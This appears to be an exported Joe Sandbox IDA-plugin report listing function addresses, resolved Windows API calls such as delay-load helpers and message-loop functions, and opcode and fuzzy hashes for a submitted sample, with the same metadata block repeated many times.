Source File: 00000000.00000002.2125519220.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.2125474990.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125544070.0000000000BF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000BFD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C04000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C20000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125644304.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_YyVnwn8Zst.jbxd

Similarity

API ID: Gdip$AllocBitmapCreateFromStream
String ID:
API String ID: 1915507550-0
Opcode ID: f9ecb590552b2b580b1cf5339642e2c4e000770527f6ba0c64e2eb0109c3f4cc
Instruction ID: d8cf2f7878c26b7525c7e2cd891caf60039c46931bb9eada52ac7c15d265c732
Opcode Fuzzy Hash: f9ecb590552b2b580b1cf5339642e2c4e000770527f6ba0c64e2eb0109c3f4cc
Instruction Fuzzy Hash: 42D0A73060410D7ADF516B60CC02D7AFADDDB01700F0080F7BC0885351F972CD11A751

Function 00BC97E9 Relevance: 1.5, APIs: 1, Instructions: 15COMMON

Download Yara Rule

APIs

GetFileType.KERNELBASE(000000FF,00BC971B), ref: 00BC97F5

Memory Dump Source

Source File: 00000000.00000002.2125519220.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.2125474990.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125544070.0000000000BF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000BFD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C04000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C20000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125644304.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_YyVnwn8Zst.jbxd

Similarity

API ID: FileType
String ID:
API String ID: 3081899298-0
Opcode ID: 895b478d5d7da40145f51c425843c1b7fb62aa0a6d57b4149cae45e80244a34c
Instruction ID: 21ca82daa44e5f44c944de68f4c056f60ae985625f089c32cab21ab6de0e5084
Opcode Fuzzy Hash: 895b478d5d7da40145f51c425843c1b7fb62aa0a6d57b4149cae45e80244a34c
Instruction Fuzzy Hash: 65D01231022140A5AF314A384D4D9A56A91DB433A6B78D6E8D065C60A1CF23CC43F500

Function 00BDCA54 Relevance: 1.5, APIs: 1, Instructions: 13windowCOMMON

Download Yara Rule

APIs

SendDlgItemMessageW.USER32(0000006A,00000402,00000000,?,?), ref: 00BDCA79

Part of subcall function 00BDA3FB: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00BDA40C
Part of subcall function 00BDA3FB: KiUserCallbackDispatcher.NTDLL(?,00000000,00000000,00000000), ref: 00BDA41D
Part of subcall function 00BDA3FB: TranslateMessage.USER32(?), ref: 00BDA427
Part of subcall function 00BDA3FB: DispatchMessageW.USER32(?), ref: 00BDA431

Memory Dump Source

Source File: 00000000.00000002.2125519220.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.2125474990.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125544070.0000000000BF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000BFD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C04000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C20000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125644304.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_YyVnwn8Zst.jbxd

Similarity

API ID: Message$CallbackDispatchDispatcherItemPeekSendTranslateUser
String ID:
API String ID: 2588387001-0
Opcode ID: 24f44ecd485a3d296288bbcfaa3ce28fec5ccab34f41738012171e0ae3097590
Instruction ID: b8683ff7e6bfc187118e7e0a0a64d6b6234b4788d934af373bfde7640171c66c
Opcode Fuzzy Hash: 24f44ecd485a3d296288bbcfaa3ce28fec5ccab34f41738012171e0ae3097590
Instruction Fuzzy Hash: 97D09E71158200AADA022B51CE06F5A7AE3AB98B05F004695B345740B18662AD31DB06

Function 00BDD82F Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00BDD841

Part of subcall function 00BDD58F: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BDD60C
Part of subcall function 00BDD58F: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BDD61D

Memory Dump Source

Source File: 00000000.00000002.2125519220.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.2125474990.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125544070.0000000000BF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000BFD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C04000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C20000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125644304.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_YyVnwn8Zst.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: bc947e64b7ff7861dab40ebc73a0b1643733832cee6e190708a637422537bdde
Instruction ID: fa2d6cafae1d12b1d62fa9465497aa122a0f21c143c6f4aa12343045df0caba3
Opcode Fuzzy Hash: bc947e64b7ff7861dab40ebc73a0b1643733832cee6e190708a637422537bdde
Instruction Fuzzy Hash: 8DB012DE3580057D310D61002F42C3A82CCC0E4B1933042EBF145C6140B4411C0D5033

Function 00BDD1F9 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00BDD20B

Part of subcall function 00BDD58F: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BDD60C
Part of subcall function 00BDD58F: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BDD61D

Memory Dump Source

Source File: 00000000.00000002.2125519220.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.2125474990.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125544070.0000000000BF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000BFD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C04000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C20000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125644304.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_YyVnwn8Zst.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 4442f5e5b8e5d789888c10320488988e70b29ab661a31c2c338e7d0a44d269e2
Instruction ID: 12cb4792a3e1fed6faa1169b84c6a81b7f1248be7ed85ab006b29b7f43e24e5d
Opcode Fuzzy Hash: 4442f5e5b8e5d789888c10320488988e70b29ab661a31c2c338e7d0a44d269e2
Instruction Fuzzy Hash: 8EB092962692096D21082604AD06C364188C180B163204AEBB181C2180A4404E480032

Function 00BDD293 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00BDD26C

Part of subcall function 00BDD58F: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BDD60C
Part of subcall function 00BDD58F: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BDD61D

Memory Dump Source

Source File: 00000000.00000002.2125519220.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.2125474990.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125544070.0000000000BF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000BFD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C04000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C20000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125644304.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_YyVnwn8Zst.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 62899f73cbb87356427b999129e0799edb7a69e8baaebc874361adb6bc9e4c3f
Instruction ID: 21990e4b2574977e1ccd755e92b8b87262763c0fb6993a69f31dab72d02629ed
Opcode Fuzzy Hash: 62899f73cbb87356427b999129e0799edb7a69e8baaebc874361adb6bc9e4c3f
Instruction Fuzzy Hash: BEB012C635C2056D310C51046D02F3642CDD0C4B1933052DBF1C5C3240F4404C0D2033

Function 00BDD289 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00BDD26C

Part of subcall function 00BDD58F: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BDD60C
Part of subcall function 00BDD58F: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BDD61D

Memory Dump Source

Source File: 00000000.00000002.2125519220.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.2125474990.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125544070.0000000000BF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000BFD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C04000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C20000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125644304.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_YyVnwn8Zst.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: ffe33b8ab98b7713d2797d6fa29245f0dd0d22e5cd236065afea2f9981695cf6
Instruction ID: ea6be6d48149216a8daa5a3463c9d6c3aa2e5c5ab9d9ceb3bfb592e370522e0c
Opcode Fuzzy Hash: ffe33b8ab98b7713d2797d6fa29245f0dd0d22e5cd236065afea2f9981695cf6
Instruction Fuzzy Hash: 9FB012C635C2056D310C51047D42E3A42CDC0C4B1933092DBF5C5C3240F4404C0D1033

Function 00BDD232 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00BDD20B

Part of subcall function 00BDD58F: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BDD60C
Part of subcall function 00BDD58F: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BDD61D

Memory Dump Source

Source File: 00000000.00000002.2125519220.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.2125474990.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125544070.0000000000BF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000BFD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C04000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C20000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125644304.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_YyVnwn8Zst.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 715b75c22a25a15e91d752743a77037d1ced6418faa4d182ad0d127cb4dcb6b3
Instruction ID: 3d41322fd8d78792a38e04e464a6d890387c0f1b1f72542a4567e563f344b402
Opcode Fuzzy Hash: 715b75c22a25a15e91d752743a77037d1ced6418faa4d182ad0d127cb4dcb6b3
Instruction Fuzzy Hash: F8B012D635D1096D310C65086E06D3641CCC0C4B1633049EBF185C3240F4404D0D0033

Function 00BDD21E Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00BDD20B

Part of subcall function 00BDD58F: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BDD60C
Part of subcall function 00BDD58F: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BDD61D

Memory Dump Source

Source File: 00000000.00000002.2125519220.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.2125474990.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125544070.0000000000BF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000BFD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C04000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C20000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125644304.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_YyVnwn8Zst.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: ad4572ecb37fb9ae176b58543ecc42f6f7eb0c518400dc1c63beaf16935e19e9
Instruction ID: aefbccf10de593b427b493d4c7f4f4eaadc1a92008715f74c423bb129caa9786
Opcode Fuzzy Hash: ad4572ecb37fb9ae176b58543ecc42f6f7eb0c518400dc1c63beaf16935e19e9
Instruction Fuzzy Hash: 4BB012D635D1096D310C65086D06D3A42DCC4C4B1633089EBF585C3240F4404D0C0033

Function 00BDD214 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00BDD20B

Part of subcall function 00BDD58F: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BDD60C
Part of subcall function 00BDD58F: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BDD61D

Memory Dump Source

Source File: 00000000.00000002.2125519220.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.2125474990.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125544070.0000000000BF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000BFD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C04000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C20000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125644304.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_YyVnwn8Zst.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 69ee4ce4d8da60f115c027b3aeca6338abaf89b378667d8cd3851958e4155118
Instruction ID: 09dfa1b4569ad985e9ccc8558c924abb3d56b20054c2a2ba23a0074643138b97
Opcode Fuzzy Hash: 69ee4ce4d8da60f115c027b3aeca6338abaf89b378667d8cd3851958e4155118
Instruction Fuzzy Hash: 6FB012D635D1096D311C65046D02D3641CCC0C4B1633049EBF185C3284F4404D0C1033

Function 00BDD25A Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00BDD26C

Part of subcall function 00BDD58F: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BDD60C
Part of subcall function 00BDD58F: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BDD61D

Memory Dump Source

Source File: 00000000.00000002.2125519220.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.2125474990.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125544070.0000000000BF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000BFD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C04000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C20000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125644304.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_YyVnwn8Zst.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: a128e67fffc9b57c9e6216218bd2ddc8764ecf9c44e2ae39ed0dd58202e82b94
Instruction ID: aa10867e1e6cfcf3607386a01acfbe3b78c2926c21cb25d0405b08e2ef5ff4c7
Opcode Fuzzy Hash: a128e67fffc9b57c9e6216218bd2ddc8764ecf9c44e2ae39ed0dd58202e82b94
Instruction Fuzzy Hash: BFB012C636C3057D310C12006D02D3642CDC1C0B1D33053DBF1C1C3180B4404C4D2033

Function 00BDD284 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00BDD26C

Part of subcall function 00BDD58F: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BDD60C
Part of subcall function 00BDD58F: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BDD61D

Memory Dump Source

Source File: 00000000.00000002.2125519220.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.2125474990.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125544070.0000000000BF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000BFD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C04000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C20000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125644304.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_YyVnwn8Zst.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 9140c2c1c311b326053f2896450232332f609bb3cf61e277c1dfcfd259ff6e35
Instruction ID: 8a68bd57030befb2101e06e377fa4c055aa666cf36ed43d435bdbf8353bc2f76
Opcode Fuzzy Hash: 9140c2c1c311b326053f2896450232332f609bb3cf61e277c1dfcfd259ff6e35
Instruction Fuzzy Hash: ACA002D525D2067D350C51516D46D76419DC4D4B55330559BF5C58615174445D4D1032

Function 00BDD22D Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00BDD20B

Part of subcall function 00BDD58F: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BDD60C
Part of subcall function 00BDD58F: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BDD61D

Memory Dump Source

Source File: 00000000.00000002.2125519220.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.2125474990.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125544070.0000000000BF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000BFD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C04000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C20000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125644304.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_YyVnwn8Zst.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 9c2928bb2dbe3e3bed61c9e6edf036fd6b34ab46f415591680d511d6be758c3f
Instruction ID: 9bbf5903212f8539ba24e82fe04c52182b367d25787cefac10bff09ef8b3f4b8
Opcode Fuzzy Hash: 9c2928bb2dbe3e3bed61c9e6edf036fd6b34ab46f415591680d511d6be758c3f
Instruction Fuzzy Hash: 46A012D525D1067C300C25006D02C36418CC0C4B1633049DBF081C1140B4400D080032

Function 00BDD27A Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00BDD26C

Part of subcall function 00BDD58F: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BDD60C
Part of subcall function 00BDD58F: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BDD61D

Memory Dump Source

Source File: 00000000.00000002.2125519220.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.2125474990.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125544070.0000000000BF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000BFD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C04000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C20000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125644304.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_YyVnwn8Zst.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: cbbfa82dcdc407d8996ad77b3cc5c9aee20e4ccb2c09009531a3592f9d071dcb
Instruction ID: 8a68bd57030befb2101e06e377fa4c055aa666cf36ed43d435bdbf8353bc2f76
Opcode Fuzzy Hash: cbbfa82dcdc407d8996ad77b3cc5c9aee20e4ccb2c09009531a3592f9d071dcb
Instruction Fuzzy Hash: ACA002D525D2067D350C51516D46D76419DC4D4B55330559BF5C58615174445D4D1032

Function 00BDD255 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00BDD20B

Part of subcall function 00BDD58F: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BDD60C
Part of subcall function 00BDD58F: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BDD61D

Memory Dump Source

Source File: 00000000.00000002.2125519220.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.2125474990.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125544070.0000000000BF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000BFD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C04000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C20000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125644304.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_YyVnwn8Zst.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 741b4639c956f3d0205fd70ed86d1f4b5b6d4dbfd741e9bf452b86f7b1e5cd44
Instruction ID: 9bbf5903212f8539ba24e82fe04c52182b367d25787cefac10bff09ef8b3f4b8
Opcode Fuzzy Hash: 741b4639c956f3d0205fd70ed86d1f4b5b6d4dbfd741e9bf452b86f7b1e5cd44
Instruction Fuzzy Hash: 46A012D525D1067C300C25006D02C36418CC0C4B1633049DBF081C1140B4400D080032

Function 00BDD24B Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00BDD20B

Part of subcall function 00BDD58F: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BDD60C
Part of subcall function 00BDD58F: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BDD61D

Memory Dump Source

Source File: 00000000.00000002.2125519220.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.2125474990.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125544070.0000000000BF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000BFD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C04000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C20000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125644304.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_YyVnwn8Zst.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: ea7c2d68d455b8bba16b2032bdc0ef33ac55c93868e27bae517c162f6c2e57e8
Instruction ID: 9bbf5903212f8539ba24e82fe04c52182b367d25787cefac10bff09ef8b3f4b8
Opcode Fuzzy Hash: ea7c2d68d455b8bba16b2032bdc0ef33ac55c93868e27bae517c162f6c2e57e8
Instruction Fuzzy Hash: 46A012D525D1067C300C25006D02C36418CC0C4B1633049DBF081C1140B4400D080032

Function 00BDD241 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00BDD20B

Part of subcall function 00BDD58F: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BDD60C
Part of subcall function 00BDD58F: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BDD61D

Memory Dump Source

Source File: 00000000.00000002.2125519220.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.2125474990.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125544070.0000000000BF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000BFD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C04000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C20000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125644304.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_YyVnwn8Zst.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
